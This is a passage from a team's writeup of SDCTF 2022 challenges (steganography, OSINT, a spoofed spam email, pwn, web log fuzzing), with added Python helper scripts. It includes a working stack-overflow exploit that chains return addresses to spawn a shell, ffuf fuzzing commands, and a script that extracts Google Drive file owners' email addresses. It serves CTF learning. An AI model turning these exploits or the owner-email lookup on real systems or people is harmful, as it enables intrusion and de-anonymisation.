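    """Read the LSB of one channel back into bytes, the inverse of embed_lsb."""
    bits = [px[channel] & 1 for px in pixels[:nbytes * 8]]
    return bytes(
        sum(bit << (7 - j) for j, bit in enumerate(bits[i:i + 8]))
        for i in range(0, len(bits), 8)
    )


# Constructed 8x4 cover image: a smooth gradient whose LSBs are all zero.
WIDTH = 8
COVER = [(100 + x * 10, 120, 140 + y * 5) for y in range(4) for x in range(WIDTH)]
STEGO = embed_lsb(COVER, 0, b"hi!")  # 24 bits land in the first 24 pixels

if __name__ == "__main__":
    print(plane_to_text(bit_plane(STEGO, WIDTH, 0, 0)))  # red plane 0 now shows the bits
    print(extract_lsb(STEGO, 0, 3))
```

The low planes of an untouched photo look like noise; a plane that shows structure (text, a shape, a sharp edge) is the one carrying the payload, which is exactly what the eye picks out in StegSolve.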

And here is the flag: sdctf{c0untle55_col0rfu1_c0lors_cov3ring_3veryth1ng}


Bishop Duel

Solved by: Taz34

We have a chess board; we play the white bishop and the opponent the black bishop. A bishop never leaves the colour of square it starts on, so while the two bishops sit on opposite colours neither can ever capture the other and the game can't be won or lost. In the image below the opponent's bishop (‘BB’) moves on one set of squares and ours (‘WW’) on the other, so we need to get our bishop onto the opponent's colour.

To do that we have to step off the board, and there are two ways out: the top-right corner or the bottom-left corner. I decided to go out at the top right: C1, then E2, and we landed on a square of the other colour.

Now just put the bishop in the opponent's way so it gets captured; losing gets the flag.

Flag: sdctf{L0SiNG_y0uR_S0uRC3_C0d3_sUcKs}

osint

Mann-Hunt

Solved by: Avantika (iamavu)

Mann Hunt

We were on the trail of a notorious hacker earlier this week, but they suddenly went dark, taking down all of their internet presence...All we have is a username. We need you to track down their personal email address! It will be in the form ****.sdctf@gmail.com. Once you find it, send them an email to demand the flag!

Username
mann5549

We have a username, mann5549. I checked the Discord server but couldn't find anything.

Let's try to find social media accounts; usually I go with instant-username-search. From there I got the Twitter account: https://twitter.com/mann5549

which listed a website, https://mann.codes. I couldn't really find much on that website, even in the Wayback Machine. Coding reminded me of GitHub, so I did a GitHub search for mann5549, but there was no such user. I thought I should also query for the website name itself (mann.codes), and that found the user. YAY.

Visiting the repository and going through the commits, specifically this file [src/components/seo.js](https://github.com/manncyber/manncodes.github.io/commit/e81f6315e6a1ecc2277246547f85f3c9e0ebf11e#diff-46bb1d99a93bc5b6f63d50361abac9cc4c09038b92b77536c85a93ff2f8fc401), I found a name.

Googling this name gives a LinkedIn profile as the very first result: https://www.linkedin.com/in/emanuel-hunt-34749a207/

The profile links to a Google Drive file; let's see what it is: https://drive.google.com/file/d/10No4G_5iv2t5jxbvg2-weXkFouZrnQtg/view. Sadly no email here D:, but then I remembered that we can look up the metadata of a Google Drive file via Google's API and possibly get the email. Let's go to the Google API documentation: https://developers.google.com/drive/api/v3/reference/files/get

Reading the documentation, I realised we need the fileId, which is present in the URL itself, and we need to tell the API to return every metadata field (fields=*).

Hit execute and boom, we get the email address mann.sdctf@gmail.com. Now send an email to it asking for the flag, and soon we get an auto-reply with the flag.

FLAG - **sdctf{MaNN_tH@t_w@s_Ann0YinG}**

P.S.: Alternate way to check for docs email:


Google-Ransom

Solved by: Avantika (iamavu) and Starry-Lord

Google Ransom
Oh no! A hacker has stolen a flag from us and is holding it ransom. Can you help us figure out who created this document? Find their email address and demand they return the flag!

Ransom Letter - https://docs.google.com/document/d/1MbY-aT4WY6jcfTugUEpLTjPQyIL9pnZgX_jP8d8G2Uo/edit

We can find the owner of any Drive file via the Google Drive API: call files.get with the fileId taken from the URL, https://developers.google.com/drive/api/v3/reference/files/get

With fields=* the API returns every metadata field, including the owners and their addresses; we get the email amy.sdctf@gmail.com. Send them an email and we get our flag back.
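Both this solve and Mann-Hunt above rely on the same files.get call. The following Python script is an added example, not part of the original writeup: it extracts the fileId from Docs and Drive URLs, builds the files.get request with fields=*, and pulls the owner addresses out of the response. Only fetch_metadata touches the network, and it assumes a Google API key in the GOOGLE_API_KEY environment variable (that is enough for files shared with anyone who has the link); SAMPLE_RESPONSE is a constructed stand-in for the API's reply, with a made-up address.

```python
"""Google Drive owner lookup behind the Mann-Hunt and Google-Ransom solves.

Added example, not part of the original writeup. Only fetch_metadata talks to
Google (it assumes an API key in GOOGLE_API_KEY; that suffices for files shared
with anyone who has the link). SAMPLE_RESPONSE is a constructed stand-in for
what the call returns.
"""
import json
import os
import re
import urllib.parse
import urllib.request

DRIVE_FILES_GET = "https://www.googleapis.com/drive/v3/files/"


def extract_file_id(url: str) -> str:
    """The fileId embedded in Docs/Drive URLs: .../d/<id>/..., .../file/d/<id>/..., ?id=<id>."""
    m = re.search(r"/d/([A-Za-z0-9_-]+)|[?&]id=([A-Za-z0-9_-]+)", url)
    if not m:
        raise ValueError("no Drive file id in %r" % url)
    return m.group(1) or m.group(2)


def metadata_url(file_id: str, api_key: str) -> str:
    """files.get with fields=*: every metadata field, including owners[].emailAddress."""
    query = urllib.parse.urlencode({"fields": "*", "key": api_key})
    return DRIVE_FILES_GET + urllib.parse.quote(file_id) + "?" + query


def fetch_metadata(file_id: str, api_key: str = os.environ.get("GOOGLE_API_KEY", "")) -> dict:
    """Network call (not exercised offline): GET the metadata and parse the JSON."""
    with urllib.request.urlopen(metadata_url(file_id, api_key), timeout=15) as resp:
        return json.load(resp)


def owner_emails(metadata: dict) -> list:
    """Addresses from owners[] plus lastModifyingUser, de-duplicated, in order."""
    people = list(metadata.get("owners", []))
    if "lastModifyingUser" in metadata:
        people.append(metadata["lastModifyingUser"])
    seen, out = set(), []
    for p in people:
        email = p.get("emailAddress")
        if email and email not in seen:
            seen.add(email)
            out.append(email)
    return out


# Constructed response shaped like files.get output; the address is made up.
SAMPLE_RESPONSE = {
    "kind": "drive#file",
    "id": "1MbY-aT4WY6jcfTugUEpLTjPQyIL9pnZgX_jP8d8G2Uo",
    "name": "Ransom Letter",
    "mimeType": "application/vnd.google-apps.document",
    "owners": [{"displayName": "Amy", "emailAddress": "someone.sdctf@example.com"}],
    "lastModifyingUser": {"displayName": "Amy", "emailAddress": "someone.sdctf@example.com"},
}

if __name__ == "__main__":
    import sys
    fid = extract_file_id(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_RESPONSE["id"]
    meta = fetch_metadata(fid) if len(sys.argv) > 1 else SAMPLE_RESPONSE
    print(fid, "->", owner_emails(meta))
```

The owner's address is exposed because the file is shared publicly; the same call on a file you own shows exactly what a stranger with the link can learn, which is worth checking before publishing a Drive link.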

FLAG - sdctf{0p3n_S0uRCE_1S_aMaz1NG}


Part of the ship

Solved by: Avantika (iamavu) and Starry-Lord

Part of the ship...
Sometimes I worry about my friend... he's way too into memes, he's always smiling, and he's always spouting nonsense about some "forbidden app." I don't know what he's talking about, but maybe you can help me figure it out! All I know is a username he used way back in the day. Good luck! Flag format is sdctf{flag}

Username
DanFlashes

“Smiling” and “app” reminded me of iFunny. I went to https://ifunny.co/user/DanFlashes, but it gave a 404, so the first thing I usually do is check the Wayback Machine, and boom, we got our flag: https://web.archive.org/web/20220128003432/https://ifunny.co/user/DanFlashes

FLAG - sdctf{morning_noon_and_night_I_meme}

Additional details:

https://ifunny.co/picture/top-definition-part-of-the-ship-part-of-the-crew-LKPb8Zjx7


Samuel

Solved by: Avantika (iamavu) and Starry-Lord

We have a YouTube video, https://www.youtube.com/watch?v=fDGVF1fK1cA. It is blurry, showing a beacon going on and off at night, with what seem to be cable cars or planes in the distance. The short and long flashes looked like Morse code. Here's the decoded Morse:

WHWHWHGODWROUGHT

https://www.history.com/.amp/this-day-in-history/what-hath-god-wrought

According to the link, Samuel Morse demonstrated the telegraph in 1844 with the message “What hath God wrought”.
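The following Python script is an added example, not part of the original writeup: it decodes Morse from a log of on/off durations, the way one would transcribe the beacon, estimating the dot length from the shortest flash so the beacon's speed need not be known in advance. The blink timings in the block are constructed (with some jitter, as hand-measured ones would have); nothing here was extracted from the video.

```python
"""Morse decoding from a blinking beacon, as on the Samuel challenge.

Added example, not part of the original writeup. BLINKS is constructed; with
the real video you would log each on/off duration from the frame timestamps
or from a brightness trace of the beacon region.
"""
MORSE = {
    "A": ".-", "B": "-...", "C": "-.-.", "D": "-..", "E": ".", "F": "..-.", "G": "--.",
    "H": "....", "I": "..", "J": ".---", "K": "-.-", "L": ".-..", "M": "--", "N": "-.",
    "O": "---", "P": ".--.", "Q": "--.-", "R": ".-.", "S": "...", "T": "-", "U": "..-",
    "V": "...-", "W": ".--", "X": "-..-", "Y": "-.--", "Z": "--..",
}
REVERSE = {code: letter for letter, code in MORSE.items()}


def decode_morse(symbols: str) -> str:
    """'.-- .... .- -' -> 'WHAT'; letters separated by spaces, words by '/'."""
    words = []
    for word in symbols.split("/"):
        words.append("".join(REVERSE.get(code, "?") for code in word.split()))
    return " ".join(words)


def timings_from_text(text: str, unit: float = 1.0) -> list:
    """Encoder: (is_on, duration) pairs with ITU ratios, dot 1, dash 3, gaps 1/3/7."""
    out = []
    for w, word in enumerate(text.upper().split()):
        if w:
            out.append((False, 7 * unit))
        for li, letter in enumerate(word):
            if li:
                out.append((False, 3 * unit))
            for s, sym in enumerate(MORSE[letter]):
                if s:
                    out.append((False, unit))
                out.append((True, unit if sym == "." else 3 * unit))
    return out


def symbols_from_timings(timings: list, unit: float = 1.0) -> str:
    """Decoder: classify each on-interval as dot/dash and each off-interval as a gap.

    Thresholds sit halfway between the ideal ratios so hand-measured, jittery
    timings still classify correctly.
    """
    out = []
    for is_on, duration in timings:
        ratio = duration / unit
        if is_on:
            out.append("." if ratio < 2 else "-")
        elif ratio >= 5:
            out.append(" / ")
        elif ratio >= 2:
            out.append(" ")
    return "".join(out)


def estimate_unit(timings: list) -> float:
    """The shortest flash is a dot; use it when the beacon's speed is unknown."""
    return min(d for on, d in timings if on)


def decode_beacon(timings: list) -> str:
    unit = estimate_unit(timings)
    return decode_morse(symbols_from_timings(timings, unit))


# Constructed blink log in seconds for "WHAT HATH GOD WROUGHT": 0.4 s per unit, with jitter.
BLINKS = [(on, d * 0.4 * (1.1 if i % 3 == 0 else 0.95))
          for i, (on, d) in enumerate(timings_from_text("WHAT HATH GOD WROUGHT"))]

if __name__ == "__main__":
    print(symbols_from_timings(BLINKS, estimate_unit(BLINKS)))
    print(decode_beacon(BLINKS))
```

A beacon that loops the message, as this one does, also produces a long off-interval between repetitions, which the word-gap rule turns into a separator rather than garbage.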

So we are looking for a beacon that sends the message in morse code, and I found this https://sculpturemagazine.art/mixed-messages-mark-bradfords-what-hath-god-wrought/

Avantika then found the location for this place on Google maps. https://www.google.com/maps/place/What+Hath+God+Wrought/@32.8752134,-117.2429636,17z/data=!3m1!4b1!4m5!3m4!1s0x80dc07e0d30e81a7:0x69087278617d6b1d!8m2!3d32.8752134!4d-117.2407749

sdctf{32.875,-117.240}

Paypal Playboy

Solved by: Starry-Lord

link for the mail: https://cdn.discordapp.com/attachments/808487148332122144/969683292918001787/mbox

Reading the mail shows a base64-encoded body (base64 is a commonly used Content-Transfer-Encoding for e-mail). The Received headers also show the message was injected through emkei.cz (an anonymous mailer) with an SPF result of neutral, so the From address tells us nothing about who sent it.

    From flag.peddler@wehate.sdc.tf Sat Apr 23 00:39:01 2022
    Delivered-To: [redacted]@gmail.com
    Received: by 2002:a05:6520:266f:b0:1b9:b81b:dce2 with SMTP id il15csp1101047lkb;
            Fri, 22 Apr 2022 17:39:02 -0700 (PDT)
    X-Google-Smtp-Source: ABdhPJzxwJlzfSGrxfS8BUrPyF3Rv2x9sStBn/U0tFRYMXyPsNYCyOVhWQQn7IKnPNjwjmMRrzkp
    X-Received: by 2002:a05:6402:d2:b0:413:2e50:d6fd with SMTP id i18-20020a05640200d200b004132e50d6fdmr7715550edu.171.1650674341863;
            Fri, 22 Apr 2022 17:39:01 -0700 (PDT)
    ARC-Seal: i=1; a=rsa-sha256; t=1650674341; cv=none;
            d=google.com; s=arc-20160816;
            b=BnpreoBKj7rM/1WsS1qGkQIpbJ5Q7glsLDD6PWDJRM4ChXRSMefEmwqElRjZAsNnxQ
             WbkErwUv9FGbI9XDj0QRlgbcKOY+zfDryej6XaZQ7/YzfTNUYFVLQ9H1tFQvNV32oI9m
             2d8eZn4LyHtp4x4M2nIplYo9EWPUObAd9/V2ajSdVBagveQXocWA28Sdcy2bflA0SplT
             gOUu1TWsT1yD1aRwIzdwyJY8J139u02P7ZIjvO0OHunde46MKIlcA50KyumhKeTCyxqJ
             YLjmgyw6Aey6PlG224L9Mslkcg739k81aUKUTMflpKGqxzM75UZepuCoKyVcwpCp+3vc
             WFug==
    ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816;
            h=date:message-id:mime-version:reply-to:errors-to:importance:from
             :subject:to;
            bh=SklLFzj9D7lIOMbltmueGQUwZr9CMGutPIb3RqUNk6E=;
            b=EEGOb2Wm/rKABjU6iN1Cv+E3b6mU3Ke04PhXntTkpa7vGH8WeZg7GCfg7dmrBLGyDb
             nGC6L9utfPWqzL7tBmXDtyzqVJE/Qy82QujjnKuT5Vnxuwn1mU1ZOoAXr0KfyK8hOIe6
             jn2nQGeADRUuEedqomYGjUH6RGjuU536npXLWtqmwIwWIRv08UYkItB6ma5pDuuyEdId
             PBwv2ByfPMrReSahatKSk3FbvVuQMCqmHwSlvCIJC2fbNMVw64cQwyCP0sOl1CsFbu98
             UmtH/8ptv3tavNNjIpNqvwCFyp9pbvqZvhOUwDakqV6rY2USr51DIBFymLBllWiCHupb
             w2ZQ==
    ARC-Authentication-Results: i=1; mx.google.com;
           spf=neutral (google.com: 101.99.94.116 is neither permitted nor denied by best guess record for domain of flag.peddler@wehate.sdc.tf) smtp.mailfrom=flag.peddler@wehate.sdc.tf
    Return-Path: <flag.peddler@wehate.sdc.tf>
    Received: from emkei.cz (emkei.cz. [101.99.94.116])
            by mx.google.com with UTF8SMTPS id c1-20020a170906694100b006df76385bb2si7985374ejs.82.2022.04.22.17.39.01
            for <[redacted]@gmail.com>
            (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
            Fri, 22 Apr 2022 17:39:01 -0700 (PDT)
    Received-SPF: neutral (google.com: 101.99.94.116 is neither permitted nor denied by best guess record for domain of flag.peddler@wehate.sdc.tf) client-ip=101.99.94.116;
    Authentication-Results: mx.google.com;
           spf=neutral (google.com: 101.99.94.116 is neither permitted nor denied by best guess record for domain of flag.peddler@wehate.sdc.tf) smtp.mailfrom=flag.peddler@wehate.sdc.tf
    Received: by emkei.cz (Postfix, from userid 33)
            id 41BF9182372; Sat, 23 Apr 2022 02:39:01 +0200 (CEST)
    To: [redacted]@gmail.com
    Subject: very cheap banner
    From: "cheap sdctf banner" <flag.peddler@wehate.sdc.tf>
    X-Priority: 3 (Normal)
    Importance: Normal
    Errors-To: flag.peddler@wehate.sdc.tf
    Reply-To: flag.peddler@wehate.sdc.tf
    MIME-version: 1.0
    Content-Type: multipart/mixed; boundary=BOUND_62634AA53D6521.02935547
    Message-Id: <20220423003901.41BF9182372@emkei.cz>
    Date: Sat, 23 Apr 2022 02:39:01 +0200 (CEST)
    
    --BOUND_62634AA53D6521.02935547
    Content-Type: text/plain; charset=utf-8
    Content-Transfer-Encoding: base64
    
    5Zyj5Zyw5Lqa5ZOl572R57uc5a6J5YWo6L+Q5Yqo5Lya55qE5buJ5Lu35qiq5bmF44CC5oiQ5Li6
    IFNEQ1RGIOeahOi1ouWutuOAguW/q+aNt+aWueS+v+OAgueCueWHu+S4i+aWueOAguWco+WcsOS6
    muWTpee9kee7nOWuieWFqOi/kOWKqOS8mueahOW7ieS7t+aoquW5heOAguaIkOS4uiBTRENURiDn
    moTotaLlrrbjgILlv6vmjbfmlrnkvr/jgILngrnlh7vkuIvmlrnjgILlnKPlnLDkuprlk6XnvZHn
    u5zlronlhajov5DliqjkvJrnmoTlu4nku7fmqKrluYXjgILmiJDkuLogU0RDVEYg55qE6LWi5a62
    44CC5b+r5o235pa55L6/44CC54K55Ye75LiL5pa544CC5oKo5Lmf5Y+v5Lul5ZyoIFBheVBhbOaI
    luiAheWMuuWdl+mTvuS4iuaJvuWIsOaIkeS7rOOAgjB4QkFkLi4uQTQzQi4uLi4uIFNEQ1RGe+S8
    qumAoOeahF/ml5fluJx9IDPvuI/ig6Mg8J+SsCDinLPvuI8g8J+RnyDwn5izIPCfk5kg8J+NkyDw
    n5i6IPCfkYgg8J+UoCDwn4+eIPCflpYg8J+QviDwn4OPIPCflZUg8J+QtiDwn5uPIPCflJEg4p2H
    77iPIPCfkqkg4qyH77iPIPCfiLfvuI8g8J+RnSDwn5mIIPCfmoIg8J+UnSDimKog4pqh77iPIPCf
    k6wg8J+YtyDwn4+oIPCfmoQg8J+PmSDwn5WcIOKGmO+4jyDwn42VIPCfkagg8J+MjyDil77vuI8g
    8J+MjiDwn5i4IPCfjYQg4pyz77iPIPCflaEg8J+amyDwn5GnIPCflLsg4pmT77iPIPCflKAg8J+Y
    rQ==
    mbox part 1/2

The body is Chinese text. Base64-decoded, it is a spam-style advert repeated three times, 圣地亚哥网络安全运动会的廉价横幅。成为 SDCTF 的赢家。快捷方便。点击下方。 (roughly “Cheap banners for the San Diego cyber-security competition. Become an SDCTF winner. Quick and convenient. Click below.”), then 您也可以在 PayPal或者区块链上找到我们。 (“You can also find us on PayPal or on the blockchain.”), a partial wallet address 0xBAd...A43B, a decoy SDCTF{伪造的_旗帜} (“fake flag”) and a row of emoji.

Then we also have an attachment, named 支付.png (“pay.png” in Chinese):

    mbox part 2/2
    --BOUND_62634AA53D6521.02935547
    Content-Type: image/png; name="支付.png"
    Content-Transfer-Encoding: base64
    Content-Disposition: attachment; filename="支付.png"
    
    iVBORw0KGgoAAAANSUhEUgAAAUYAAAFOCAYAAAD6hLSdAAABPmlDQ1BJQ0MgUHJvZmlsZQAAKJFj
    YGASSCwoyGFhYGDIzSspCnJ3UoiIjFJgf8bAwiDMIMigxcCXmFxc4BgQ4ANUwgCjUcG3awyMIPqy
    Lsisncmnb3+YKdt7w+KqjrKaJjemehTAlZJanAyk/wBxYnJBUQkDA2MCkK1cXlIAYrcA2SJFQEcB
    2TNA7HQIew2InQRhHwCrCQlyBrKvANkCyRmJKUD2EyBbJwlJPB2JDbUXBNiNzH0DjI0JuJQMUJJa
    UQKinfMLKosy0zNKFByBIZSq4JmXrKejYGRgZMTAAApviOrPN8DhyCjGgRArBPrPypOBgSkXIZYQ
    wMCw4wPImwgxVR0GBp7jDAwHYgsSixLhDmD8xlKcZmwEYXNvZ2Bgnfb//+dwoJc1GRj+Xv////f2
    ////LmNgYL4F1PsNABfNXW1QnDRZAAAAYmVYSWZNTQAqAAAACAACARIAAwAAAAEAAQAAh2kABAAA
    AAEAAAAmAAAAAAADkoYABwAAABIAAABQoAIABAAAAAEAAAFGoAMABAAAAAEAAAFOAAAAAEFTQ0lJ
    AAAAU2NyZWVuc2hvdNuRKQwAAAI9aVRYdFhNTDpjb20uYWRvYmUueG1wAAAAAAA8eDp4bXBtZXRh
    IHhtbG5zOng9ImFkb2JlOm5zOm1ldGEvIiB4OnhtcHRrPSJYTVAgQ29yZSA2LjAuMCI+CiAgIDxy
    ZGY6UkRGIHhtbG5zOnJkZj0iaHR0cDovL3d3dy53My5vcmcvMTk5OS8wMi8yMi1yZGYtc3ludGF4
    <--SNIP-->
    DtgBO+CN0eeAHbADdmDDAW+MG4b4rR2wA3bAG6PPATtgB+zAhgPeGDcM8Vs7YAfsgDdGnwN2wA7Y
    gQ0HvDFuGOK3dsAO2AFvjD4H7IAdsAMbDnhj3DDEb+2AHbAD3hh9DtgBO2AHNhzwxrhhiN/aATtg
    B7wx+hywA3bADmw44I1xwxC/tQN2wA54Y/Q5YAfsgB3YcMAb44YhfmsH7IAd8Mboc8AO2AE7sOGA
    N8YNQ/zWDtgBO/D/ATm6EF9LClK2AAAAAElFTkSuQmCC
    
    
    --BOUND_62634AA53D6521.02935547--

After base64-decoding the attachment we get a PNG containing a QR code.

pay.png
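Rather than pasting base64 into a decoder, the message can be parsed as MIME, which handles the transfer encoding, the charset and the attachment name in one go. The following Python script is an added example, not part of the original writeup: it walks the parts, decodes the text body, saves attachments under a sanitised name (the name is attacker-controlled), and reads the Received chain. SAMPLE_MBOX is constructed to mirror the structure of the challenge mail; the PNG bytes are a signature plus filler, not a real QR code.

```python
"""Walk a MIME message, decode the base64 parts and save the attachments safely.

Added example, not code from the original writeup. SAMPLE_MBOX is constructed
with the same shape as the challenge mail (envelope line, Received header,
multipart/mixed with a base64 text body and a base64 PNG attachment); pass a
real mbox path on the command line to process that instead.
"""
import base64
import email
import os

BODY_TEXT = "圣地亚哥网络安全运动会的廉价横幅。"  # first sentence of the real body
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8  # PNG signature plus filler, not a real image
SAMPLE_MBOX = (
    "From flag.peddler@wehate.sdc.tf Sat Apr 23 00:39:01 2022\n"
    "Received: from emkei.cz (emkei.cz. [101.99.94.116]) by mx.google.com;\n"
    "        Fri, 22 Apr 2022 17:39:01 -0700 (PDT)\n"
    'From: "cheap sdctf banner" <flag.peddler@wehate.sdc.tf>\n'
    "To: victim@example.com\n"
    "Subject: very cheap banner\n"
    "MIME-Version: 1.0\n"
    "Content-Type: multipart/mixed; boundary=BOUND_EXAMPLE\n"
    "\n"
    "--BOUND_EXAMPLE\n"
    "Content-Type: text/plain; charset=utf-8\n"
    "Content-Transfer-Encoding: base64\n"
    "\n" + base64.b64encode(BODY_TEXT.encode("utf-8")).decode() + "\n"
    "--BOUND_EXAMPLE\n"
    'Content-Type: image/png; name="支付.png"\n'
    "Content-Transfer-Encoding: base64\n"
    'Content-Disposition: attachment; filename="支付.png"\n'
    "\n" + base64.b64encode(PNG_BYTES).decode() + "\n"
    "--BOUND_EXAMPLE--\n"
)


def parse_message(raw: str):
    """Parse one message; a leading mbox 'From ' envelope line is recognised."""
    return email.message_from_string(raw)


def text_parts(msg) -> list:
    """Decoded text bodies; decode=True undoes the Content-Transfer-Encoding."""
    out = []
    for part in msg.walk():
        if part.get_content_type() == "text/plain" and not part.is_multipart():
            charset = part.get_content_charset() or "utf-8"
            out.append(part.get_payload(decode=True).decode(charset, "replace"))
    return out


def attachments(msg) -> list:
    """(filename, bytes) for each attachment part."""
    return [(part.get_filename() or "unnamed", part.get_payload(decode=True))
            for part in msg.walk() if part.get_content_disposition() == "attachment"]


def received_hops(msg) -> list:
    """Received: headers, the one closest to us first; the last names the injecting MTA."""
    return msg.get_all("Received", [])


def safe_name(filename: str) -> str:
    """Attachment names are attacker-controlled: keep only the base name, never a path."""
    return os.path.basename(filename.replace("\\", "/")) or "unnamed"


if __name__ == "__main__":
    import sys
    raw = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_MBOX
    msg = parse_message(raw)
    print("From:", msg["From"], "| injected via:", received_hops(msg)[-1].split()[1])
    for text in text_parts(msg):
        print("body:", text)
    for name, data in attachments(msg):
        with open(safe_name(name), "wb") as fh:
            fh.write(data)
        print("saved", safe_name(name), len(data), "bytes")
```

Once the PNG is on disk, any QR reader (zbarimg, or a phone) turns it into the cash.app link that the writeup follows next.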

Reading this with any qr code reader app gives a link to the cash app page of the seller.

https://cash.app/$limosheen?qr=1

Nothing much in the url itself, but now we have a username “limosheen” which we can hunt for.

Staying in the money app spectrum, we could find a paypal user with that name here:

https://paypal.me/limosheen

New clues to work with! We can see a wallet address, labelled as being for ropETH. That is not a common name for it, but it means Ropsten ether: Ropsten was one of the public Ethereum testnets, used for development and testing before deploying to mainnet, so its coins have no real value.

So now that we have the wallet and the blockchain, we can try and follow the money 💸

https://ropsten.etherscan.io/address/0xbad914d292cbfee9d93a6a7a16400cb53319a43b

We can see a small number of transactions from 15 days ago, and only one outgoing transaction to another wallet. Following the money, this wallet looks interesting:

Receiving wallet (with a hefty amount of ETH and no outgoing transactions):

0x949213139D202115c8b878E8Af1F1D8949459f3f

I got lucky on this one. I always considered Google to be the superior search engine, period, but for the first time, it was not showing anything. DuckDuckGo won this fight.

This url was not available anymore, but when looking back in time we can find the flag, still base 64 encoded.

https://www.reddit.com/user/wrestling-wave/comments/u9tgk7/how_i_made_10000000_selling_fake_flags_ama/

https://web.archive.org/web/*/https://www.reddit.com/user/wrestling-wave/comments/u9tgk7/how_i_made_10000000_selling_fake_flags_ama/

Only one capture to look into:

sdctf{You_Ever_Dance_With_the_Devil_In_the_Pale_Moonlight}

pwn

Horoscope

Solved by: Taz34

Here we have a binary, so the first thing I did was look for a segmentation fault by feeding it an oversized input, and we got one.

Next I looked for the offset to the saved return address: after the date prefix, 42 bytes of padding are needed, i.e.

    python3 -c "print('10/10/1999/10:' + '1'*42)"

Hence the crashing payload is: 10/10/1999/10:111111111111111111111111111111111111111111

Now we looked at the binary in Ghidra and found a function “test”, which spawns a shell on the target.

The problem is that test only does so when the condition (temp == 1) is true. Going through the other functions we found “debug”, which satisfies it, so we return into debug first and then into test (the binary is not position independent, so both addresses are fixed).

Now we can construct the final payload as:

    payload = b"01/01/2001/01:111111111111111111111111111111111111111111" + debug_fun_addr + test_fun_addr

hence the final script:

    from pwn import *

    p = remote("horoscope.sdc.tf", 1337)

    # date prefix + 42 bytes of padding, then the saved return address becomes
    # debug (0x40096e) and the next qword on the stack becomes test (0x400950)
    payload = b"01/01/2001/01:111111111111111111111111111111111111111111" + p64(0x40096e) + p64(0x400950)

    p.sendline(payload)
    p.interactive()

now just execute this script to get the flag
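The following Python script is an added example, not part of the original writeup. It shows how the 42-byte offset can be found systematically with a de Bruijn pattern instead of by trial (the same construction pwntools' cyclic()/cyclic_find() use, re-implemented here so it has no dependency), and how the two addresses are laid out after the padding so that debug() returns into test(). The prefix, offset and addresses are the writeup's own; the function names debug and test follow the Ghidra listing described above.

```python
"""Finding the overflow offset and chaining two return addresses, as for Horoscope.

Added example, not part of the original writeup. The pattern functions reproduce
what pwntools' cyclic()/cyclic_find() do, without the dependency; the addresses
0x40096e (debug) and 0x400950 (test) and the 42-byte offset are the writeup's own.
"""
import itertools
import string
import struct

ALPHABET = string.ascii_lowercase


def de_bruijn(n: int = 4, alphabet: str = ALPHABET):
    """Lazily yield the lexicographically least de Bruijn sequence B(k, n): every
    window of n characters occurs exactly once, so a crash value pins its offset."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length: int, n: int = 4) -> bytes:
    """First `length` bytes of the pattern: send this where the date digits went."""
    return "".join(itertools.islice(de_bruijn(n), length)).encode()


def cyclic_find(value, n: int = 4, max_len: int = 100_000) -> int:
    """Offset of a crash value in the pattern. Accepts the bytes seen in a
    register or the integer the debugger prints (little-endian)."""
    if isinstance(value, int):
        value = struct.pack("<Q", value)
    return cyclic(max_len, n).find(bytes(value)[:n])


def p64(addr: int) -> bytes:
    """Little-endian 8-byte pointer, like pwntools' p64."""
    return struct.pack("<Q", addr)


def build_payload(prefix: bytes, offset: int, chain: list, filler: bytes = b"A") -> bytes:
    """prefix + padding up to the saved return address + each address in order.

    The first address replaces the saved return address, so the function returns
    into debug(); when debug() itself returns, the next 8 bytes on the stack are
    popped, so test() runs with the condition already satisfied.
    """
    return prefix + filler * offset + b"".join(p64(a) for a in chain)


# The Horoscope numbers: the binary is not PIE, so these addresses are fixed.
PREFIX = b"01/01/2001/01:"
OFFSET = 42
DEBUG_ADDR = 0x40096E
TEST_ADDR = 0x400950

if __name__ == "__main__":
    print("probe:", PREFIX + cyclic(100))
    crash = cyclic(100)[OFFSET:OFFSET + 8]  # what RSP points at after the probe crashes
    print("offset recovered from crash bytes:", cyclic_find(crash))
    print("payload:", build_payload(PREFIX, OFFSET, [DEBUG_ADDR, TEST_ADDR]))
```

Returning through debug() into test() only works because debug() returns normally with a balanced stack; if a function in the chain expects arguments or a particular alignment, a ROP gadget (pop; ret) between the two addresses is the usual fix.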

Flag: sdctf{S33ms_y0ur_h0rO5c0p3_W4s_g00d_1oD4y}

web

Lots of logs

Solved by: thewhiteh4t

The blog contains links to 3 log files. Per the hints in the challenge description we are supposed to find more log files, and the assumption is that one of them will contain the flag.

On the basis of the URL of the 3 available log files I created a small custom wordlist :

    > cat wordlist.txt
    0
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    2010
    2011
    2012
    2013
    2014
    2015
    2016
    2017
    2018
    2019
    2020
    2021
    2022
    Mon.log
    Tue.log
    Wed.log
    Thu.log
    Thur.log
    Fri.log
    Sat.log
    Sun.log

then I used ffuf to fuzz the challenge site to find more logs…

ffuf -w wordlist.txt -u https://logs.sdc.tf/logs/FUZZ -recursion -recursion-depth 5 -o results.txt -of csv

in the result I gathered over 1900 logs!

After this I tried to curl them and grep for sdctf, but that found nothing, so the flag wasn't available directly. Then I downloaded all available logs 😞 using wget.

After wasting some hours:

    grep -vrnw "SELL\|FIN\|PROC\|LOG\|PROF" .

-v inverts the match; I used it because I was looking for unusual lines. Most lines in these logs contain one of the keywords SELL, FIN, PROC, LOG or PROF, which is the normal content, so printing only the lines that contain none of them (-w matches whole words) leaves the anomalies.
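The following Python script is an added example, not part of the original writeup: it generates the same wordlist as the hand-written one above and reproduces the inverted whole-word grep over a directory of downloaded logs, so the sifting can be re-run or extended (for instance with more noise keywords) without retyping. SAMPLE_LOGS is constructed; load_logs() reads the real files.

```python
"""Wordlist generation and anomaly sifting for the "Lots of logs" challenge.

Added example, not part of the original writeup. SAMPLE_LOGS is constructed to
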